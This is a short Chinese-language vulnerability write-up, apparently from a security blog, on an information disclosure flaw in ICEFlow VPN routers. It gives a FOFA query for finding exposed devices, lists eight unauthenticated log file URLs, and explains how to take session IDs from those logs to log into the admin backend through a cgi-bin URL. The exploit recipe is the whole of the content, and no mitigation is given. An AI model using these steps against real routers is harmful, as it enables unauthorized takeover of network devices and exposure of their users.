# ICEFlow VPN 信息洩露漏洞
==FOFA==
title="ICEFLOW VPN Router"
==漏洞利用==
可訪問的日誌 Url
系統日誌 http://url/log/system.log VPN日誌 http://url/log/vpn.log 訪問日誌 http://url/log/access.log 告警日誌 http://url/log/warn.log 錯誤日誌 http://url/log/error.log 調試日誌 http://url/log1/debug.log 移動用戶日誌 http://url/log/mobile.log 防火牆日誌 http://url/log/firewall.log
根據日誌信息獲得session後,可利用實時登錄系統管理後台:
http://xxx.xxx.xxx.xxx/cgi-bin/index?oid=10&session_id=xxxxxxxxxxxxxx&l=0
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容